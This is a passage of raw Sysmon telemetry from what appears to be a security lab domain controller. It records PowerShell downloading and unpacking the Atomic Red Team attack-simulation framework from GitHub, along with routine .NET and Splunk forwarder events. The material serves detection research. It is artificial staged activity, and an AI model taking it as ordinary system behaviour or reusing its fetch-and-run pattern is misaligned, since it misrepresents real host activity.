@"C:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000023640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.920{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D305-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.920{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdline2021-06-23 21:07:16.920 11241100x800000000000000023638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:07:16.920{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dll2021-06-23 21:07:16.920 23542300x800000000000000023637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F11FE4DE461B22324DF622CBEB7D207E,SHA256=90E59EB81D958467FF3ED2984DE657A2879EE8FB9C8F92759607B4E6BABBF6F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D305-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D305-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-A284-60D3-D205-00000000CF01}5344NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8ZMQJ8Q7GU\System.IdentityModel.ni.dll.auxMD5=9D0F00700D609652DB902734694613B8,SHA256=D5308FC45EA8A28CBFF14C74E91DC0026F997C5B3E9B17A323DBEA25977C5C9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-A284-60D3-D205-00000000CF01}5344NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8ZMQJ8Q7GU\System.IdentityModel.ni.dllMD5=E171AA6EB5C47D45E21E912A9E26EA98,SHA256=90F0557CF1BBCAE2D6B4ABFD7DE702F9AC5A3935491769174D190C6CBDE8EFD1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86B297E17168F63CD906B2937D737E01,SHA256=76C2F662B1A49CA119E2E7456A5B3D15D577A44D3629B6038735E5DA866EFA99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90F1A01ED8BA67163ABD052F2DAD5345,SHA256=EEE39BB25DA99D952F63E6E0BD1EAAE0333A33A97BD60DE7E5F4900DAD9FE4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC42DA873F19A35FC903144869F8192F,SHA256=29D4FB9FAA753A2D496B181F99E488E099FBDCC23EB1B2A556CB143F5465A21E,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000023629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.256{4DB9351A-A273-60D3-3C05-00000000CF01}6608codeload.github.com0::ffff:192.30.255.120;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000023628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.103{4DB9351A-A273-60D3-3C05-00000000CF01}6608github.com0::ffff:192.30.255.112;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000023627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.728{4DB9351A-A273-60D3-3C05-00000000CF01}6608raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000023626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.670{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D205-00000000CF01}5344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D205-00000000CF01}5344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D205-00000000CF01}5344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A284-60D3-D105-00000000CF01}5760NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YQAEZ766ZH\System.EnterpriseServices.Wrapper.dllMD5=715FF11BA35606E6E6D22AC9EA360824,SHA256=DD1656A330AF91227E6A2FD9AE4C2E8829CC1212C41FEA65AB87CAABA05F8DE0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A284-60D3-D105-00000000CF01}5760NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YQAEZ766ZH\System.EnterpriseServices.ni.dll.auxMD5=0A3D733CF2912E64250EDA39EEA5531A,SHA256=65D8DC51F11912EAAC4ABC33D20B3B85A8721C8B727880FE923CD5D2DE06486D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A284-60D3-D105-00000000CF01}5760NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YQAEZ766ZH\System.EnterpriseServices.ni.dllMD5=F1FAE792833A0090B3C155ED4C26FAF7,SHA256=06B53500FAF788E149178EF100B99C3F89A6E9111EF5A7FA4BEEF99FAA0E2F19,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.623{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\master.zipMD5=A835063F1AA49BF95D9B393BC78EB8CA,SHA256=247D8D6B21A6EBA5843B8E5433118D0EE8C94A28EB92EEF996F33A7E357EDA38,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.608{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicsfolder.ps12021-06-23 21:07:16.608 10341000x800000000000000023618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.592{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D105-00000000CF01}5760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.576{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicredteam.ps12021-06-23 21:07:16.576 10341000x800000000000000023616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.561{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D105-00000000CF01}5760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.561{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D105-00000000CF01}5760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.561{4DB9351A-A284-60D3-D005-00000000CF01}3612NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K7U6OZ6A6D\System.Dynamic.ni.dll.auxMD5=BAA8E28D1B78655FCA9B26FA0D7A202F,SHA256=6736A5FF78346F0498FCA9EC7826F6E750C31503A73F18E792D037C4B34C375A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.561{4DB9351A-A284-60D3-D005-00000000CF01}3612NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K7U6OZ6A6D\System.Dynamic.ni.dllMD5=39CB09B4CB7AFFA46F57708996A8FE92,SHA256=6640581B7485BF2A511220565F42CF360851DF014D797F258F92264C1E9EB57B,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000023612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.545{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Start-AtomicGUI.ps12021-06-23 21:07:16.545 10341000x800000000000000023611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.530{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D005-00000000CF01}3612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AFF602605D771CEBDEF51059DEC5535,SHA256=8735743C2FEC162C2771004B2C58AC68DD017B8D6DFD77491CA05D9E7571E091,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.514{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\New-Atomic.ps12021-06-23 21:07:16.514 10341000x800000000000000023608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D005-00000000CF01}3612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.514{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D005-00000000CF01}3612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.498{4DB9351A-A284-60D3-CF05-00000000CF01}4516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ARSHHV1SQX\System.Drawing.Design.ni.dll.auxMD5=38B70933C0263249D83215EB568C7269,SHA256=7E01B9872D90725A61503FA41114E400002696A2B7D90ED8CC7AA6F5CE6DD541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.498{4DB9351A-A284-60D3-CF05-00000000CF01}4516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ARSHHV1SQX\System.Drawing.Design.ni.dllMD5=647B303FBCF115898C70ABF925B57278,SHA256=1ECB033BA255DE468EF8FEF72BD327206DE597DF9D65424BFD93BCDB06131DB9,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000023604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-WebRequestVerifyHash.ps12021-06-23 21:07:16.498 10341000x800000000000000023603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-CF05-00000000CF01}4516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.483{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-MalDoc.ps12021-06-23 21:07:16.483 11241100x800000000000000023601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 